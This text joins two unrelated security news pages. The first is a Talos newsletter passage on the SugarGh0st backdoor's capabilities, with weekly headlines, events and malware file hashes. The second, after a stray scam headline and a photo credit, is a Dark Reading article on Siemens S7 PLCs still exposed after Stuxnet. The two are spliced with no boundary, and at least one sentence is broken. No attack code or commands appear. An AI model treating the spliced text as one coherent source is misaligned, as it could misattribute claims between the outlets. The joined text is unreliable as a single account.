If infected, SugarGh0st serves as a fully functional backdoor for the adversary that can execute most remote-control functionalities. It can launch the reverse shell and run the arbitrary commands sent from C2 as strings using the command shell. SugarGh0st can collect the victim’s machine hostname, filesystem, logical drive, and operating system information. It can access the running process information of the victim’s machine and control the environment by accessing the process information and terminating the process as directed by the C2 server. It can also manage the machine’s service manager by accessing the configuration files of the running services and can start, terminate or delete the services. 

**So now what? **

Since this seems to be an offshoot of GhostRAT, we certainly can’t rule out any other variants that may be floating out there. Talos also has new ClamAV signatures, Snort rules and other Cisco Secure protection to specifically detect and stop SugarGh0st.  

**Top security headlines of the week **

**Cisco Talos and other teams across Cisco recently worked with multiple government partners to help protect the Ukrainian power grid and ensure it runs appropriately.** The effort, spearheaded by Talos’ Joe Marshall, involved creating bespoke hardware for Ukraine’s energy supplier, Ukrenergo, to operate in place of traditional GPS devices that the Ukrainian power grid relies on to keep running on time. GPS satellites and Ukrainian substations have constantly been the target of kinetic and cyber threats during Russia’s invasion of Ukraine. Officials from multiple U.S. government agencies assisted in the project.  The Pentagon set up flights to physically deliver the manipulated switches, the Department of Energy helped coordinate the equipment’s delivery, and, as Ukrenergo told CNN, the Department of Commerce was a part of critical meetings that first outlined this project. Taras Vasyliv, who oversees power dispatching for Ukrenergo, told CNN that the custom-built switches were the equivalent of a “flashlight” for a surgeon who is trying to operate in the dark. (CNN, Business Insider) 

**Leaked government documents show that some local, federal and state law enforcement officers have been able to view the phone records of millions of Americans,** even those who have not been accused or suspected of a crime. The little-known Pentagon program was partially uncovered because of a letter sent from U.S. Sen. Ron Wyden of Oregon to U.S. Attorney General Merrick Garland, in Wyden’s office requested more information on the project and encouraged the federal government to publicly disclose this knowledge. The letter states the White House pays wireless company AT&T to give all federal, state, local, and Tribal law enforcement agencies “the ability to request often-warrantless searches.” Known as the “Hemisphere Project,” this program has apparently been around since 2007 and reported on by the New York Times in 2013 but has largely gone unnoticed since. Wyden is attempting to challenge the legality of the Hemisphere Project. (Wired) 

**Security researchers have found a way to bypass the Microsoft Hello login authentication system** used in many fingerprint readers and face ID scanners on devices from Dell, Lenovo and Microsoft. Researchers hired by Microsoft to test the security of the readers have since informed the company of these vulnerabilities. The attack the researchers outlined could provide access to a stolen laptop or carry out what's called an “evil maid” attack on an unattended device. Microsoft introduced Hello with its Windows 10 operating system, and since then has included fingerprint scanners on all its devices (though in some cases, Microsoft’s own hardware like the Surface tablet did not use Hello). Though the manufacturers are now aware of these vulnerabilities, the variety of attacks means it can be difficult to patch for these issues. However, all the attacks ultimately required physical access to a device. (Ars Technica, The Verge) 

**Can’t get enough Talos? **

*   Tech giant Cisco built special device to help Kyiv ward off cyberattacks on power grid 
*   Cisco whips up modded switch to secure Ukraine grid against Russian cyberattacks 
*   Talos Takes Ep. #163: Why has the Phobos ransomware been working for so long? 
*   The Need to Know: What is threat hunting? 
*   Vulnerability Roundup: Vulnerabilities in Adobe Acrobat, Microsoft Excel could lead to arbitrary code execution 

**Upcoming events where you can find Talos **

**"Power of the Platform” by Cisco** **(Dec. 5 & 7)** 

Virtual (Please note: This presentation will only be given in German) 

> _The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you._  

**What Threats Kept Us Up in 2023: A Year in Review and a Look Ahead** **(Dec. 13, 11 a.m. PT)** 

Virtual 

> _Each year brings new threats that take advantage of increasingly complex security environments. Whether it’s Volt Typhoon targeting critical infrastructure organizations across the United States or ALPHV launching an attack against casino giant MGM, threat actors are becoming bolder and more evasive. That’s why it’s never been more important to leverage broad telemetry sources, deep network insights and threat intelligence to respond effectively and recover faster from sophisticated attacks. Join Amy Henderson, Director of Strategic Planning and Communications at Cisco Talos and Briana Farro, Director of XDR Product Management at Cisco, as they discuss some of the top threat trends and threats we have seen this past year and how to leverage security technology like XDR and network insights to fight against them._ 

**NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security** **(Jan. 11, 2024, 10 a.m. GMT)** 

Virtual 

> _The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations._  

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** streamer.exe   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg 

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6   
**MD5:** 22ae85259273bc4ea419584293eda886   
**Typical Filename:** KMSAuto++ x64.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** Hacktool:PUP.26ld.in14.Talos 

**SHA 256:** 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e   
**MD5:** 040cd888e971f2872d6d5dafd52e6194   
**Typical Filename:** tmp000c3787   
**Claimed Product:** Ultra Virus Killer   
**Detection Name:** PUA.Win.Virus.Ultra::95.sbx.tg 

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa   
**MD5:** 9403425a34e0c78a919681a09e5c16da   
**Typical Filename:** vincpsarzh.exe   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

$19 Stanely cups, fake Amazon Prime memberships all part of holiday shopping scams circulating

Security updates are tedious and difficult, so users continue to use a weak version of a core protocol and remain exposed to major attacks on critical infrastructure.

Source: John Edwards via Alamy Stock Photo

Programmable logic controllers (PLCs) that were vulnerable to the Stuxnet attack are still in use globally and rarely have security controls deployed — meaning they're still at risk.

More than 10 years after Stuxnet, new research shows users rarely switch on security controls such as using passwords, and feel updates are too cumbersome to be applied.

Colin Finck, tech lead of reverse engineering and connectivity at Enlyze, says the Siemens proprietary protocol which is used to read and write data as well as to program the S7 PLC. However, this is only protected by obfuscation, which the researchers were able to bypass.

Finck and his colleague Tom Dohrmann, software engineer, reverse engineering and connectivity, will present their findings at Black Hat Europe in London next week, in a talk titled "A Decade After Stuxnet: How Siemens S7 Is Still an Attacker's Heaven."

**Still Feeling the Stuxnet Effects**

In the 2010 attack, the Stuxnet attackers exploited several zero-day vulnerabilities in Microsoft Windows to ultimately gain access to Siemens software and the PLCs. This was done to gain access to and effectively damage high-speed centrifuges at the Iranian Bushehr nuclear power plant.

The impact of Stuxnet was huge, as it remotely damaged around a thousand centrifuges, and the worm's controllers were also able to analyze communication protocols between the PLCs to exploit further technological weaknesses. It also paved the way for things to come: After Stuxnet, a number of industrial control-related attacks were detected over the years, including BlackEnergy and Colonial Pipeline.

Finck tells Dark Reading that after the Stuxnet attacks took place, Siemens developed a revised protocol for the PLCs that added "lots of obfuscation and cryptography layers." However, the researchers in recent probing were able to bypass that obfuscation to give them the ability to read and write instructions for the PLCs, and ultimately stop the controller working in a proof of concept.

A statement from Siemens sent to Dark Reading acknowledged that the levels of obfuscation do not offer enough security, and a Security Bulletin from October 2022 stated that two of the PLCs "use a built-in global private key which cannot be considered anymore as sufficiently protected."

The statement added: "Siemens has deprecated this previous version of the communication protocol and encourages everyone to migrate to V17 or later to enable the new TLS \[Transport Layer Security\]-based communication protocol."

**Improved Firmware**

That most recent Siemens firmware released in 2022 does include TLS, but Finck claims there is no "long-term service for cybersecurity issues" and calls for Siemens to provide better means to update firmware "because right now, it's wide open to anybody who could just access it over the Internet."

In its statement, Siemens said it is aware of the talk scheduled for Black Hat Europe and stated that the talk "will describe the details of the legacy PG/PC and HMI communication protocol as used between TIA Portal/HMIs and SIMATIC S7-1500 SW Controller in versions before V17."

The company stated that no previously unknown security vulnerabilities will be disclosed in this talk and that Siemens is in close coordination with the researchers. Siemens recommended users to apply mitigations, including:

*   Applying client authentication using strong and individual access level passwords.
    
*   Migrating to V17 or later to enable the new TLS-based communication protocol for all SIMATIC S7-1200/1500 PLCs including SW Controller (see Siemens Security Bulletin SSB-898115 \[2\]).
    
*   Implementing the defense-in-depth approach for plant operations and configure the environment according to Siemens operational guidelines for industrial security.
    

Though the researchers praised the response by Siemens, they noted that PLC firmware is rarely updated by users, "and there's not an established update process to quickly roll out \[updates\] to a fleet of machines."

Finck says doing updates is "probably a tedious manual process to walk to every machine, plug something in and update the firmware," and thus, Siemens needs to offer better update processes so customers have an incentive to deploy those updates.

In the meantime, he says, "you better not have a direct connection to all PLCs right now, due to the aforementioned security problems."

**About the Author(s)**

With more than 20 years experience of B2B journalism, including 12 years covering cybersecurity, Dan Raywood brings a wealth of experience and information security knowledge to the table. He has covered everything from the rise of APTs, nation-state hackers, and hacktivists, to data breaches and the increase in government regulation to better protect citizens and hold businesses to account. Dan is based in the U.K., and when not working, he spends his time stopping his cats from walking over his keyboard and worrying about the (Tottenham) Spurs’ next match.

Tag

#windows